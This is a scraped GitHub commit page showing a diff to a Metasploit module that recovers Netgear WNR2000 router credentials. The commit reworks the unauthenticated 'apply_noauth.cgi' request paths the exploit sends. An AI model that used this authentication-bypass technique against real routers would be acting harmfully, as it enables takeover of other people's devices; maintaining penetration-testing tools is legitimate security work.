We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 69755f6 commit 68f1380Copy full SHA for 68f1380
modules/auxiliary/admin/http/netgear_wnr2000_pass_recovery.rb
@@ -98,7 +98,8 @@ def get_creds
98
99
# 1: send serial number
100
send_request_cgi({
101
- 'uri' => '/apply_noauth.cgi?/unauth.cgi',
+ 'uri' => '/apply_noauth.cgi',
102
+ 'query' => '/unauth.cgi',
103
'method' => 'POST',
104
'Content-Type' => 'application/x-www-form-urlencoded',
105
'vars_post' =>
@@ -111,7 +112,8 @@ def get_creds
111
112
113
# 2: send answer to secret questions
114
- 'uri' => '/apply_noauth.cgi?/securityquestions.cgi',
115
116
+ 'query' => '/securityquestions.cgi',
117
118
119
0 commit comments